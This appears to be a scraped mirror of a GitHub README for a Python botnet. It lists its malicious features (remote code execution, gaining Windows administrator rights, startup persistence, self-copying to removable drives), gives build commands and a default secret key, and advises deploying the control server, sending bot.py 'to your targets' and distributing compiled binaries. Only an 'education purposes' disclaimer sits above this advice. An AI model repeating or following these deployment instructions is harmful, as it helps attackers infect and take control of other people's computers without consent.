Coder Social home page Coder Social logo

botnet's Introduction

Botnet

A simple botnet written 100% in python and distrubutable to any major OSs on which this will run natively.

Warning

THIS SOFTWARE WAS CREATED FOR EDUCATION PERPOSES ONLY.

AUTHOR WILL NOT TAKE RESPONSABILITIES OF ANY HARMS AND/OR DAMAGES CAUSED BY THIS SOFTWARE.

Features

This botnet has :

  1. Remote code execution
  2. Acquires Administrator Previleges (Windows)
  3. Adds the bot to startup (Windows)
  4. Replecates itself to all removable drives (Windows)

Build Methods

Windows

Requirements:

  • Python 3.6 or higher
  • Git
git clone https://github.com/NurTasin/botnet.git
cd botnet
pip install -r requirements.txt
make_all.bat

Linux

Requirements:

  • Git
  • Python 3.6 or higher
  • Python3-pip
git clone https://github.com/NurTasin/botnet.git
cd botnet
pip install -r requirements.txt
sh make_all.sh

MacOS

I don't own a mac. So this code is not tested on MacOS.

Requirements:

  • Git
  • Python 3.6 or higher
  • Python3-pip
git clone https://github.com/NurTasin/botnet.git
cd botnet
pip install -r requirements.txt
sh make_all.sh

Server

DEFAULT_SECRET_KEY: doyal_baba

Deploy the server.py file to your cloude provider or on your computer. After that change the address on bot.py (Line 6) and botctl.py (Line 3). And you are ready to rock and roll. Just send bot.py to your targets.

Reccomendations

If you distribute bot.py file then you have to make sure that your target device can run python file... But it is reccomended to ditribute the compiled binary (*.exe or *.elf or *.dmg). These kinds of files can be run on any device without dependencies.

botnet's People

Contributors

nurtasin avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.